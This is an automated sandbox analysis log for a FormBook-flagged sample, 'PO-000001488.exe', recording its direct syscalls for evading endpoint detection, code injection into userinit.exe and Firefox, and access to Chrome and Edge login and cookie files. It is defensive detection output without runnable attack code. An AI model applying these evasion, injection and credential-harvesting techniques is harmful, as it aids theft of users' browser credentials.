            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155E872 mov eax, dword ptr fs:[00000030h]3_2_0155E872
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155E872 mov eax, dword ptr fs:[00000030h]3_2_0155E872
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155C810 mov eax, dword ptr fs:[00000030h]3_2_0155C810
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150A830 mov eax, dword ptr fs:[00000030h]3_2_0150A830
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157483A mov eax, dword ptr fs:[00000030h]3_2_0157483A
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157483A mov eax, dword ptr fs:[00000030h]3_2_0157483A
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F2835 mov eax, dword ptr fs:[00000030h]3_2_014F2835
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F2835 mov eax, dword ptr fs:[00000030h]3_2_014F2835
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F2835 mov eax, dword ptr fs:[00000030h]3_2_014F2835
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F2835 mov ecx, dword ptr fs:[00000030h]3_2_014F2835
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F2835 mov eax, dword ptr fs:[00000030h]3_2_014F2835
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F2835 mov eax, dword ptr fs:[00000030h]3_2_014F2835
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE8C0 mov eax, dword ptr fs:[00000030h]3_2_014FE8C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A08C0 mov eax, dword ptr fs:[00000030h]3_2_015A08C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150C8F9 mov eax, dword ptr fs:[00000030h]3_2_0150C8F9
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150C8F9 mov eax, dword ptr fs:[00000030h]3_2_0150C8F9
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0159A8E4 mov eax, dword ptr fs:[00000030h]3_2_0159A8E4
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155C89D mov eax, dword ptr fs:[00000030h]3_2_0155C89D
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D0887 mov eax, dword ptr fs:[00000030h]3_2_014D0887
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157EB50 mov eax, dword ptr fs:[00000030h]3_2_0157EB50
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A2B57 mov eax, dword ptr fs:[00000030h]3_2_015A2B57
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A2B57 mov eax, dword ptr fs:[00000030h]3_2_015A2B57
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A2B57 mov eax, dword ptr fs:[00000030h]3_2_015A2B57
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A2B57 mov eax, dword ptr fs:[00000030h]3_2_015A2B57
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01584B4B mov eax, dword ptr fs:[00000030h]3_2_01584B4B
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01584B4B mov eax, dword ptr fs:[00000030h]3_2_01584B4B
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01578B42 mov eax, dword ptr fs:[00000030h]3_2_01578B42
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01566B40 mov eax, dword ptr fs:[00000030h]3_2_01566B40
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01566B40 mov eax, dword ptr fs:[00000030h]3_2_01566B40
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0159AB40 mov eax, dword ptr fs:[00000030h]3_2_0159AB40
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CCB7E mov eax, dword ptr fs:[00000030h]3_2_014CCB7E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154EB1D mov eax, dword ptr fs:[00000030h]3_2_0154EB1D
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154EB1D mov eax, dword ptr fs:[00000030h]3_2_0154EB1D
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154EB1D mov eax, dword ptr fs:[00000030h]3_2_0154EB1D
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154EB1D mov eax, dword ptr fs:[00000030h]3_2_0154EB1D
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154EB1D mov eax, dword ptr fs:[00000030h]3_2_0154EB1D
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154EB1D mov eax, dword ptr fs:[00000030h]3_2_0154EB1D
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154EB1D mov eax, dword ptr fs:[00000030h]3_2_0154EB1D
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154EB1D mov eax, dword ptr fs:[00000030h]3_2_0154EB1D
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154EB1D mov eax, dword ptr fs:[00000030h]3_2_0154EB1D
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FEB20 mov eax, dword ptr fs:[00000030h]3_2_014FEB20
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FEB20 mov eax, dword ptr fs:[00000030h]3_2_014FEB20
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01598B28 mov eax, dword ptr fs:[00000030h]3_2_01598B28
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01598B28 mov eax, dword ptr fs:[00000030h]3_2_01598B28
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D0BCD mov eax, dword ptr fs:[00000030h]3_2_014D0BCD
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D0BCD mov eax, dword ptr fs:[00000030h]3_2_014D0BCD
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D0BCD mov eax, dword ptr fs:[00000030h]3_2_014D0BCD
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F0BCB mov eax, dword ptr fs:[00000030h]3_2_014F0BCB
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F0BCB mov eax, dword ptr fs:[00000030h]3_2_014F0BCB
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F0BCB mov eax, dword ptr fs:[00000030h]3_2_014F0BCB
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157EBD0 mov eax, dword ptr fs:[00000030h]3_2_0157EBD0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155CBF0 mov eax, dword ptr fs:[00000030h]3_2_0155CBF0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FEBFC mov eax, dword ptr fs:[00000030h]3_2_014FEBFC
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D8BF0 mov eax, dword ptr fs:[00000030h]3_2_014D8BF0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D8BF0 mov eax, dword ptr fs:[00000030h]3_2_014D8BF0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D8BF0 mov eax, dword ptr fs:[00000030h]3_2_014D8BF0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01584BB0 mov eax, dword ptr fs:[00000030h]3_2_01584BB0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01584BB0 mov eax, dword ptr fs:[00000030h]3_2_01584BB0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0BBE mov eax, dword ptr fs:[00000030h]3_2_014E0BBE
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0BBE mov eax, dword ptr fs:[00000030h]3_2_014E0BBE
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0A5B mov eax, dword ptr fs:[00000030h]3_2_014E0A5B
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0A5B mov eax, dword ptr fs:[00000030h]3_2_014E0A5B
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D6A50 mov eax, dword ptr fs:[00000030h]3_2_014D6A50
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D6A50 mov eax, dword ptr fs:[00000030h]3_2_014D6A50
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D6A50 mov eax, dword ptr fs:[00000030h]3_2_014D6A50
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D6A50 mov eax, dword ptr fs:[00000030h]3_2_014D6A50
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D6A50 mov eax, dword ptr fs:[00000030h]3_2_014D6A50
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D6A50 mov eax, dword ptr fs:[00000030h]3_2_014D6A50
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D6A50 mov eax, dword ptr fs:[00000030h]3_2_014D6A50
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154CA72 mov eax, dword ptr fs:[00000030h]3_2_0154CA72
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154CA72 mov eax, dword ptr fs:[00000030h]3_2_0154CA72
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157EA60 mov eax, dword ptr fs:[00000030h]3_2_0157EA60
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150CA6F mov eax, dword ptr fs:[00000030h]3_2_0150CA6F
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150CA6F mov eax, dword ptr fs:[00000030h]3_2_0150CA6F
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150CA6F mov eax, dword ptr fs:[00000030h]3_2_0150CA6F
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155CA11 mov eax, dword ptr fs:[00000030h]3_2_0155CA11
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FEA2E mov eax, dword ptr fs:[00000030h]3_2_014FEA2E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150CA38 mov eax, dword ptr fs:[00000030h]3_2_0150CA38
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150CA24 mov eax, dword ptr fs:[00000030h]3_2_0150CA24
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F4A35 mov eax, dword ptr fs:[00000030h]3_2_014F4A35
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F4A35 mov eax, dword ptr fs:[00000030h]3_2_014F4A35
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01504AD0 mov eax, dword ptr fs:[00000030h]3_2_01504AD0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01504AD0 mov eax, dword ptr fs:[00000030h]3_2_01504AD0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D0AD0 mov eax, dword ptr fs:[00000030h]3_2_014D0AD0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01526ACC mov eax, dword ptr fs:[00000030h]3_2_01526ACC
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01526ACC mov eax, dword ptr fs:[00000030h]3_2_01526ACC
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01526ACC mov eax, dword ptr fs:[00000030h]3_2_01526ACC
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150AAEE mov eax, dword ptr fs:[00000030h]3_2_0150AAEE
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150AAEE mov eax, dword ptr fs:[00000030h]3_2_0150AAEE
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01508A90 mov edx, dword ptr fs:[00000030h]3_2_01508A90
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DEA80 mov eax, dword ptr fs:[00000030h]3_2_014DEA80
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DEA80 mov eax, dword ptr fs:[00000030h]3_2_014DEA80
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DEA80 mov eax, dword ptr fs:[00000030h]3_2_014DEA80
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DEA80 mov eax, dword ptr fs:[00000030h]3_2_014DEA80
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DEA80 mov eax, dword ptr fs:[00000030h]3_2_014DEA80
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DEA80 mov eax, dword ptr fs:[00000030h]3_2_014DEA80
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DEA80 mov eax, dword ptr fs:[00000030h]3_2_014DEA80
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DEA80 mov eax, dword ptr fs:[00000030h]3_2_014DEA80
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DEA80 mov eax, dword ptr fs:[00000030h]3_2_014DEA80
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A4A80 mov eax, dword ptr fs:[00000030h]3_2_015A4A80
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D8AA0 mov eax, dword ptr fs:[00000030h]3_2_014D8AA0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D8AA0 mov eax, dword ptr fs:[00000030h]3_2_014D8AA0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01526AA4 mov eax, dword ptr fs:[00000030h]3_2_01526AA4
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D0D59 mov eax, dword ptr fs:[00000030h]3_2_014D0D59
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D0D59 mov eax, dword ptr fs:[00000030h]3_2_014D0D59
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtProtectVirtualMemory: Direct from: 0x77457B2EJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtClose: Direct from: 0x77462B6C
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\PO-000001488.exeSection loaded: NULL target: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeSection loaded: NULL target: C:\Windows\SysWOW64\userinit.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: NULL target: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: NULL target: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\userinit.exeThread register set: target process: 4176Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\userinit.exeThread APC queued: target process: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess created: C:\Users\user\Desktop\PO-000001488.exe "C:\Users\user\Desktop\PO-000001488.exe"Jump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeProcess created: C:\Windows\SysWOW64\userinit.exe "C:\Windows\SysWOW64\userinit.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: MpfhURuSBZcuS.exe, 00000007.00000002.3308609736.0000000001811000.00000002.00000001.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000007.00000000.1691525210.0000000001810000.00000002.00000001.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3308661892.00000000017C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: MpfhURuSBZcuS.exe, 00000007.00000002.3308609736.0000000001811000.00000002.00000001.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000007.00000000.1691525210.0000000001810000.00000002.00000001.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3308661892.00000000017C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: MpfhURuSBZcuS.exe, 00000007.00000002.3308609736.0000000001811000.00000002.00000001.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000007.00000000.1691525210.0000000001810000.00000002.00000001.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3308661892.00000000017C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
            Source: MpfhURuSBZcuS.exe, 00000007.00000002.3308609736.0000000001811000.00000002.00000001.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000007.00000000.1691525210.0000000001810000.00000002.00000001.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3308661892.00000000017C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\PO-000001488.exeQueries volume information: C:\Users\user\Desktop\PO-000001488.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.PO-000001488.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.PO-000001488.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.3308944674.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1769630236.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3308999188.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1770519170.0000000003FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3311216289.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\userinit.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
